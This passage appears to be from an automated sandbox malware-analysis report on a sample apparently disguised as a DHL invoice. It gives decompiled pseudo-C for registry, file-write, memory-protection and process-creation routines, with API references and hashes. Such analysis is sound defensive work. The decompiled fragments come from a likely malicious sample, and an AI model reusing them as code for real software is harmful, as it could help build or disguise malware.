                                                                            			}







                                                                            0x00406a11
                                                                            0x00406a17
                                                                            0x00406a22
                                                                            0x00406a2a
                                                                            0x00406a31
                                                                            0x00406a31
                                                                            0x00406a37

                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,0041F538,00403348,?,0041F538,?,0041F538,?,00000004), ref: 00406A22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
                                                                            • Instruction ID: 40df579de253d7cbce13811cecf730e98513d225cd3d08ff0a4c9fddec416105
                                                                            • Opcode Fuzzy Hash: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
                                                                            • Instruction Fuzzy Hash: F9E0BF32600129BBCF205B5ADC04E9FFF6DEE926A07114026F905A2150E670EE11DAE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004062A5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                            				void* _t7;
                                                                            				long _t8;
                                                                            				void* _t9;
                                                                            
                                                                            				_t7 = E00406120(_a4,  &_a12);
                                                                            				if(_t7 != 0) {
                                                                            					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                            					return _t8;
                                                                            				}
                                                                            				_t9 = 6;
                                                                            				return _t9;
                                                                            			}






                                                                            0x004062af
                                                                            0x004062b6
                                                                            0x004062ce
                                                                            0x00000000
                                                                            0x004062ce
                                                                            0x004062ba
                                                                            0x00000000

                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
                                                                            • Instruction ID: 8015555a5faba5d47a7295c794b4dc45a0f837954a803b2f281cb622c6ff763f
                                                                            • Opcode Fuzzy Hash: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
                                                                            • Instruction Fuzzy Hash: 38E0B6B201020ABEEF096F90DC0ADBB7A5DEB08310F00492EFA0694091E6B5AD30A634
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                            
                                                                            				 *0x6f1c5014 = _a4;
                                                                            				if(_a8 == 1) {
                                                                            					VirtualProtect(0x6f1c501c, 4, 0x40, 0x6f1c5034); // executed
                                                                            					 *0x6f1c501c = 0xc2;
                                                                            					 *0x6f1c5034 = 0;
                                                                            					 *0x6f1c5030 = 0;
                                                                            					 *0x6f1c502c = 0;
                                                                            					 *0x6f1c5028 = 0;
                                                                            					 *0x6f1c5024 = 0;
                                                                            					 *0x6f1c5020 = 0;
                                                                            					 *0x6f1c501e = 0;
                                                                            				}
                                                                            				return 1;
                                                                            			}



                                                                            0x6f1c1a53
                                                                            0x6f1c1a58
                                                                            0x6f1c1a68
                                                                            0x6f1c1a70
                                                                            0x6f1c1a77
                                                                            0x6f1c1a7d
                                                                            0x6f1c1a83
                                                                            0x6f1c1a89
                                                                            0x6f1c1a8f
                                                                            0x6f1c1a95
                                                                            0x6f1c1a9b
                                                                            0x6f1c1a9b
                                                                            0x6f1c1aa4

                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(6F1C501C,00000004,00000040,6F1C5034), ref: 6F1C1A68
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1131982632.000000006F1C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F1C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1131958154.000000006F1C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132018644.000000006F1C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132042620.000000006F1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6f1c0000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: fbcf4e6788b017d14b6f6e7e1e96bef1d7fbfb103cdcd95083e7bd03c54ae120
                                                                            • Instruction ID: 96d859448fd993aa3e3a06c1d93fa820fbb4cc405ab89efc45e42258985fc60f
                                                                            • Opcode Fuzzy Hash: fbcf4e6788b017d14b6f6e7e1e96bef1d7fbfb103cdcd95083e7bd03c54ae120
                                                                            • Instruction Fuzzy Hash: B3F0C0B0959B40DACB18CF5C98446063EE0B72B7E4B0245AEF249DA341C33A41309F9A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004062D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                            				void* _t7;
                                                                            				long _t8;
                                                                            				void* _t9;
                                                                            
                                                                            				_t7 = E00406120(_a4,  &_a12);
                                                                            				if(_t7 != 0) {
                                                                            					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                            					return _t8;
                                                                            				}
                                                                            				_t9 = 6;
                                                                            				return _t9;
                                                                            			}






                                                                            0x004062e2
                                                                            0x004062e9
                                                                            0x004062fc
                                                                            0x00000000
                                                                            0x004062fc
                                                                            0x004062ed
                                                                            0x00000000

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,004069A5,00000800,?,?,?,Call,00000000,00000000), ref: 004062FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
                                                                            • Instruction ID: 212ff8f8ceecf1c7f7b975949926931c9c9ff354a47ded1b1035142b567bad43
                                                                            • Opcode Fuzzy Hash: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
                                                                            • Instruction Fuzzy Hash: 81D0123204020EBBDF116F909D05FAB3B2DAB08340F004436FE06A4091D775D930A758
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004054E8(int _a4) {
                                                                            				struct HWND__* _t2;
                                                                            				long _t3;
                                                                            
                                                                            				_t2 =  *0x4349dc;
                                                                            				if(_t2 != 0) {
                                                                            					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                            					return _t3;
                                                                            				}
                                                                            				return _t2;
                                                                            			}





                                                                            0x004054e8
                                                                            0x004054ef
                                                                            0x004054fa
                                                                            0x00000000
                                                                            0x004054fa
                                                                            0x00405500

                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
                                                                            • Instruction ID: f4f70a023dfa60edfff8c312ec9360925e699ce3f775cceab6ab340ddbd6ed3a
                                                                            • Opcode Fuzzy Hash: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
                                                                            • Instruction Fuzzy Hash: BFC04C716402407ADA109B619D09F477755AB90700F5094257200E51E4D674F410CA1C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405503(int _a4) {
                                                                            				long _t2;
                                                                            
                                                                            				_t2 = SendMessageW( *0x4349f8, 0x28, _a4, 1); // executed
                                                                            				return _t2;
                                                                            			}




                                                                            0x00405511
                                                                            0x00405517

                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,00405338), ref: 00405511
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
                                                                            • Instruction ID: 6de71dbe5e5d375af2ff60806ac132807507260846fa189ddd953f73e58556b8
                                                                            • Opcode Fuzzy Hash: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
                                                                            • Instruction Fuzzy Hash: 5EB092B5181201BADA919B10DD09F8A7B62ABA4702F028564B200640B0C7B214A0DB18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00403131(long _a4) {
                                                                            				long _t2;
                                                                            
                                                                            				_t2 = SetFilePointer( *0x40b010, _a4, 0, 0); // executed
                                                                            				return _t2;
                                                                            			}




                                                                            0x0040313f
                                                                            0x00403145

                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
                                                                            • Instruction ID: 0f2f3f991563ac80fd27f5aa645e2e28db5cd0803139906cd9636725fed969f3
                                                                            • Opcode Fuzzy Hash: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
                                                                            • Instruction Fuzzy Hash: D2B01231240200BFEA214F00DE0AF067B21F7D0700F10C830B360780F183711460EB4C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                            			E0040211B(void* _a24, void* _a32) {
                                                                            				void* _v0;
                                                                            				void* _v4;
                                                                            				void* __ebp;
                                                                            				void* _t9;
                                                                            				void* _t15;
                                                                            				void* _t20;
                                                                            
                                                                            				_t17 = E0040303E(_t15, _t20);
                                                                            				E00405D3A(0xffffffeb, _t7);
                                                                            				_t9 = E004066D6(_t17); // executed
                                                                            				if(_t9 != 0) {
                                                                            					if( *((intOrPtr*)(__esp + 0x30)) != __ebp) {
                                                                            						__eax = E00406514(__ecx, __esi);
                                                                            						if( *((intOrPtr*)(__esp + 0x2c)) < __ebp) {
                                                                            							0 = 1;
                                                                            							 *((intOrPtr*)(__esp + 0x10)) = __ebx;
                                                                            						} else {
                                                                            							__eax = E0040661F( *((intOrPtr*)(__esp + 0x18)), __eax);
                                                                            						}
                                                                            					}
                                                                            					_push(__esi);
                                                                            					__eax = CloseHandle();
                                                                            					__ebx =  *((intOrPtr*)(__esp + 0x10));
                                                                            				}
                                                                            				 *0x435ac8 =  *0x435ac8 + 1;
                                                                            				return 0;
                                                                            			}









                                                                            0x00402121
                                                                            0x00402126
                                                                            0x0040212c
                                                                            0x00402139
                                                                            0x00402143
                                                                            0x00402146
                                                                            0x0040214f
                                                                            0x0040215f
                                                                            0x00402165
                                                                            0x00402151
                                                                            0x00402156
                                                                            0x00402156
                                                                            0x0040214f
                                                                            0x00402169
                                                                            0x00402110
                                                                            0x00402ea1
                                                                            0x00402ea1
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                              • Part of subcall function 00405D3A: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
                                                                              • Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
                                                                              • Part of subcall function 00405D3A: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?), ref: 00405D99
                                                                              • Part of subcall function 00405D3A: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll), ref: 00405DB1
                                                                              • Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
                                                                              • Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
                                                                              • Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00
                                                                              • Part of subcall function 004066D6: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FD78,?), ref: 004066FF
                                                                              • Part of subcall function 004066D6: CloseHandle.KERNEL32(?), ref: 0040670C
                                                                            • CloseHandle.KERNEL32(?,?), ref: 00402110
                                                                              • Part of subcall function 00406514: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040651E
                                                                              • Part of subcall function 00406514: GetExitCodeProcess.KERNEL32(?,?), ref: 00406548
                                                                              • Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            • Opcode ID: 0c7e3ddd56b7c252a2e4c02e228c0bd9f634ef8892ef8691c332d823cf5a2231
                                                                            • Instruction ID: ffb54da432574bf9da0ba630d69bdc1efbc191342e5e665899b832719b8482a7
                                                                            • Opcode Fuzzy Hash: 0c7e3ddd56b7c252a2e4c02e228c0bd9f634ef8892ef8691c332d823cf5a2231
                                                                            • Instruction Fuzzy Hash: 50F0C8356093519BD310AF61DD8982FB298FF85359B100A3FFA52B51D2C77C4D068AAF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                            			E0040441E(struct HWND__* _a4, signed int _a8, long _a12, signed int _a16) {
                                                                            				struct HWND__* _v0;
                                                                            				signed int* _v40;
                                                                            				void* _v44;
                                                                            				signed int _v48;
                                                                            				long _v52;
                                                                            				void* _v56;
                                                                            				signed int _v60;
                                                                            				int _v64;
                                                                            				struct HWND__* _v68;
                                                                            				struct HWND__* _v72;
                                                                            				void* _v76;
                                                                            				struct HWND__* _v80;
                                                                            				void* _v84;
                                                                            				struct HWND__* _v88;
                                                                            				intOrPtr _v96;
                                                                            				void* _v100;
                                                                            				void* _v104;
                                                                            				struct HWND__* _v108;
                                                                            				signed int _t158;
                                                                            				signed int _t159;
                                                                            				int _t160;
                                                                            				void* _t167;
                                                                            				void* _t170;
                                                                            				long _t175;
                                                                            				void* _t198;
                                                                            				void* _t199;
                                                                            				int _t209;
                                                                            				intOrPtr _t214;
                                                                            				signed int _t215;
                                                                            				signed int _t216;
                                                                            				void* _t235;
                                                                            				void* _t238;
                                                                            				intOrPtr _t245;
                                                                            				intOrPtr _t253;
                                                                            				long _t257;
                                                                            				void* _t263;
                                                                            				signed int _t275;
                                                                            				signed int _t276;
                                                                            				signed int _t277;
                                                                            				signed int _t278;
                                                                            				long _t279;
                                                                            				long _t280;
                                                                            				int _t282;
                                                                            				signed int _t283;
                                                                            				signed int _t285;
                                                                            				signed int _t288;
                                                                            				int _t293;
                                                                            				signed int _t296;
                                                                            				void* _t301;
                                                                            				int _t302;
                                                                            				void* _t303;
                                                                            				void* _t306;
                                                                            				signed int _t307;
                                                                            				long _t311;
                                                                            				struct HWND__* _t312;
                                                                            				signed int _t313;
                                                                            				signed int _t314;
                                                                            				signed int _t315;
                                                                            				signed int _t316;
                                                                            				signed int _t319;
                                                                            				signed int _t320;
                                                                            				struct HWND__* _t321;
                                                                            				int _t326;
                                                                            				struct HWND__* _t327;
                                                                            				intOrPtr* _t329;
                                                                            				struct HWND__* _t330;
                                                                            				signed int _t333;
                                                                            				int _t334;
                                                                            				int _t336;
                                                                            				long _t337;
                                                                            				intOrPtr _t338;
                                                                            				signed int* _t340;
                                                                            				struct HWND__* _t342;
                                                                            				long _t343;
                                                                            				void* _t344;
                                                                            				long _t345;
                                                                            				signed int _t346;
                                                                            				struct HWND__* _t347;
                                                                            				int _t348;
                                                                            				int _t349;
                                                                            				void* _t350;
                                                                            				struct HWND__* _t352;
                                                                            				struct HWND__* _t354;
                                                                            				struct HWND__** _t355;
                                                                            
                                                                            				_t355 =  &_v80;
                                                                            				_t330 = _a4;
                                                                            				_v68 = GetDlgItem(_t330, 0x3f9);
                                                                            				_t347 = GetDlgItem(_t330, 0x408);
                                                                            				_v72 =  *0x435a28;
                                                                            				_v64 =  *0x435a10;
                                                                            				_v80 = _t347;
                                                                            				if(_a8 != 0x110) {
                                                                            					L24:
                                                                            					_t282 =  !=  ? _a8 : 0x40f;
                                                                            					_v60 = 0x40f;
                                                                            					_t158 =  !=  ? _a12 : 0;
                                                                            					_a12 = _t158;
                                                                            					_t333 =  !=  ? _a16 : 1;
                                                                            					if(0x40f == 0x4e) {
                                                                            						L26:
                                                                            						if(_t282 == 0x413) {
                                                                            							L28:
                                                                            							_t320 = _t333;
                                                                            							_t275 = _t158;
                                                                            							_t348 = _t282;
                                                                            							if(( *0x435a0c & 0x00000200) == 0 && (_t282 == 0x413 ||  *((intOrPtr*)(_t333 + 8)) == 0xfffffffe)) {
                                                                            								_t313 = E004056DA(_v80, 0 | _t282 != 0x413);
                                                                            								_t320 = _t333;
                                                                            								_a8 = _t313;
                                                                            								_t275 = _a4;
                                                                            								_t348 = _v68;
                                                                            								if(_t313 >= 0) {
                                                                            									_t314 = _t313 * 0x818;
                                                                            									_a8 = _t314;
                                                                            									_t315 =  *(_t314 + _v72 + 8);
                                                                            									_t320 = _t333;
                                                                            									if((_t315 & 0x00000010) == 0) {
                                                                            										if((_t315 & 0x00000040) == 0) {
                                                                            											_t316 = _t315 ^ 1;
                                                                            										} else {
                                                                            											_t316 =  ==  ? (_t315 ^ 0x00000080) & 0xfffffffe : _t315 ^ 0x00000080 | 0x00000001;
                                                                            										}
                                                                            										_t278 = _a16;
                                                                            										 *(_a8 + _v72 + 8) = _t316;
                                                                            										E00401221(_t278);
                                                                            										_t275 = _t278 + 1;
                                                                            										_t320 =  !( *0x435a0c >> 8) & 1;
                                                                            										_t348 = 0x40f;
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            							if(_t333 != 0) {
                                                                            								_t214 =  *((intOrPtr*)(_t333 + 8));
                                                                            								if(_t214 == 0xfffffe3d) {
                                                                            									SendMessageW(_v80, 0x419, 0,  *(_t333 + 0x5c));
                                                                            									_t214 =  *((intOrPtr*)(_t333 + 8));
                                                                            								}
                                                                            								if(_t214 == 0xfffffe39) {
                                                                            									_t296 =  *(_t333 + 0x5c) * 0x818;
                                                                            									_t312 = _v72;
                                                                            									_t215 =  *(_t296 + _t312 + 8);
                                                                            									if( *((intOrPtr*)(_t333 + 0xc)) != 2) {
                                                                            										_t216 = _t215 & 0xffffffdf;
                                                                            									} else {
                                                                            										_t216 = _t215 | 0x00000020;
                                                                            									}
                                                                            									 *(_t296 + _t312 + 8) = _t216;
                                                                            								}
                                                                            							}
                                                                            							L45:
                                                                            							_t159 = _t275;
                                                                            							_t283 = _t320;
